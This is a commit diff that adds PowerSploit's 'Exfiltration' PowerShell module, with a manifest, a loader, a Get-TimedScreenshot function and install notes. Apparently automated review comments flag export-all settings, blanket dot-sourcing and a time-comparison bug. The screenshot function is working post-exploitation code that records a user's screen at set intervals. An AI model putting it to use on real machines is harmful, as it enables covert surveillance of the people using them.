Added 'Exfiltration' Module
parent
b53b6a03a5
commit
b3bbe03e93
|
|
@ -0,0 +1,87 @@
|
|||
@{
|
||||
|
||||
# Script module or binary module file associated with this manifest.
|
||||
ModuleToProcess = 'Exfiltration.psm1'
|
||||
|
||||
# Version number of this module.
|
||||
ModuleVersion = '1.0.0.0'
|
||||
|
||||
# ID used to uniquely identify this module
|
||||
GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
|
||||
|
||||
# Author of this module
|
||||
Author = 'Matthew Graeber'
|
||||
|
||||
# Company or vendor of this module
|
||||
CompanyName = ''
|
||||
|
||||
# Copyright statement for this module
|
||||
Copyright = 'BSD 3-Clause'
|
||||
|
||||
# Description of the functionality provided by this module
|
||||
Description = 'PowerSploit Exfiltration Module'
|
||||
|
||||
# Minimum version of the Windows PowerShell engine required by this module
|
||||
PowerShellVersion = '2.0'
|
||||
|
||||
# Name of the Windows PowerShell host required by this module
|
||||
# PowerShellHostName = ''
|
||||
|
||||
# Minimum version of the Windows PowerShell host required by this module
|
||||
# PowerShellHostVersion = ''
|
||||
|
||||
# Minimum version of the .NET Framework required by this module
|
||||
# DotNetFrameworkVersion = ''
|
||||
|
||||
# Minimum version of the common language runtime (CLR) required by this module
|
||||
# CLRVersion = ''
|
||||
|
||||
# Processor architecture (None, X86, Amd64) required by this module
|
||||
# ProcessorArchitecture = ''
|
||||
|
||||
# Modules that must be imported into the global environment prior to importing this module
|
||||
# RequiredModules = @()
|
||||
|
||||
# Assemblies that must be loaded prior to importing this module
|
||||
# RequiredAssemblies = @()
|
||||
|
||||
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
|
||||
# ScriptsToProcess = ''
|
||||
|
||||
# Type files (.ps1xml) to be loaded when importing this module
|
||||
# TypesToProcess = @()
|
||||
|
||||
# Format files (.ps1xml) to be loaded when importing this module
|
||||
# FormatsToProcess = @()
|
||||
|
||||
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
|
||||
# NestedModules = @()
|
||||
|
||||
# Functions to export from this module
|
||||
FunctionsToExport = '*'
|
||||
|
||||
# Cmdlets to export from this module
|
||||
CmdletsToExport = '*'
|
||||
|
||||
# Variables to export from this module
|
||||
VariablesToExport = ''
|
||||
|
||||
# Aliases to export from this module
|
||||
AliasesToExport = ''
|
||||
|
||||
# List of all modules packaged with this module.
|
||||
ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
|
||||
|
||||
# List of all files packaged with this module
|
||||
FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
|
||||
|
||||
# Private data to pass to the module specified in RootModule/ModuleToProcess
|
||||
# PrivateData = ''
|
||||
|
||||
# HelpInfo URI of this module
|
||||
# HelpInfoURI = ''
|
||||
|
||||
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
|
||||
# DefaultCommandPrefix = ''
|
||||
|
||||
}
|
||||
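Review bot: `FunctionsToExport = '*'` and `CmdletsToExport = '*'` export whatever the root module happens to define, so the module's public surface is decided by the contents of the folder rather than by this manifest. Going by the `FileList` entry, the only command shipped here is Get-TimedScreenshot, so I would name it: `FunctionsToExport = 'Get-TimedScreenshot'` and `CmdletsToExport = ''`. An explicit list also makes an unexpected extra command visible when someone audits what an import brings into a session.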
|
|
@ -0,0 +1 @@
|
|||
Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
|
||||
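Review bot: The single line dot-sources every `*.ps1` found next to the module, so any script that ends up in that folder runs in the importing session on `Import-Module`, whether or not it shipped with the module. The per-user module path mentioned in Usage.md is writable by the user, which makes this an integrity concern and not only a tidiness one. The manifest's `FileList` already names the one script, so loading it by name is enough: `. (Join-Path $PSScriptRoot 'Get-TimedScreenshot.ps1')`.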
|
|
@ -0,0 +1,99 @@
|
|||
Function Get-TimedScreenshot {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Get-TimedScreenshot
|
||||
|
||||
Author: Chris Campbell (@obscuresec)
|
||||
License: BSD 3-Clause
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
A function that takes screenshots and saves them to a folder.
|
||||
|
||||
.PARAMETER $Path
|
||||
|
||||
Specifies the folder path.
|
||||
|
||||
.PARAMETER $Interval
|
||||
|
||||
Specifies the interval in seconds between taking screenshots.
|
||||
|
||||
.PARAMETER $EndTime
|
||||
|
||||
Specifies when the script should stop running in the format HH-MM
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
|
||||
|
||||
.LINK
|
||||
|
||||
http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
|
||||
https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
|
||||
|
||||
#>
|
||||
|
||||
[CmdletBinding()] Param(
|
||||
[Parameter(Mandatory=$True)]
|
||||
[ValidateScript({Test-Path -Path $_ })]
|
||||
[string] $Path,
|
||||
|
||||
[Parameter(Mandatory=$True)]
|
||||
[int32] $Interval,
|
||||
|
||||
[Parameter(Mandatory=$True)]
|
||||
[string] $EndTime
|
||||
)
|
||||
|
||||
#Define helper function that generates and saves screenshot
|
||||
Function GenScreenshot {
|
||||
$ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
|
||||
$ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
|
||||
$DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
|
||||
$DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
|
||||
$DrawingGraphics.Dispose()
|
||||
$ScreenshotObject.Save($FilePath)
|
||||
$ScreenshotObject.Dispose()
|
||||
}
|
||||
|
||||
Try {
|
||||
|
||||
#load required assembly
|
||||
Add-Type -Assembly System.Windows.Forms
|
||||
|
||||
Do {
|
||||
#get the current time and build the filename from it
|
||||
$Time = (Get-Date)
|
||||
|
||||
[string] $FileName = "$($Time.Month)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Day)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Year)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Hour)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Minute)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Second)"
|
||||
$FileName += '.png'
|
||||
|
||||
#use join-path to add path to filename
|
||||
[string] $FilePath = (Join-Path $Path $FileName)
|
||||
|
||||
#run screenshot function
|
||||
GenScreenshot
|
||||
|
||||
Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
|
||||
|
||||
Start-Sleep -Seconds $Interval
|
||||
}
|
||||
|
||||
#note that this will run once regardless if the specified time as passed
|
||||
While ((Get-Date -Format HH:%m) -lt $EndTime)
|
||||
}
|
||||
|
||||
Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
|
||||
|
||||
}
|
||||
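Review bot: The loop condition `(Get-Date -Format HH:%m) -lt $EndTime` compares two strings, and `%m` prints the minute without a leading zero, so at 14:05 the left side is `14:5`, which sorts after `14:30` and ends the loop early. Parsing the end time once before the `Do` and comparing DateTime values avoids this: `$Stop = [datetime]$EndTime` and `While ((Get-Date) -lt $Stop)`. The help text gives the format as HH-MM while the example passes `14:00`, so the `.PARAMETER` text should read `HH:MM`. In the `Catch`, the double-quoted `"$Error[0].ToString() + ..."` expands `$Error` as a whole and prints the rest literally; `Write-Warning $_.ToString()` would report the actual failure.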
|
|
@ -0,0 +1,12 @@
|
|||
To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
|
||||
|
||||
The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
|
||||
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
|
||||
|
||||
To use the module, type `Import-Module Exfiltration`
|
||||
|
||||
To see the commands imported, type `Get-Command -Module Exfiltration`
|
||||
|
||||
For help on each individual command, Get-Help is your friend.
|
||||
|
||||
Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
|
||||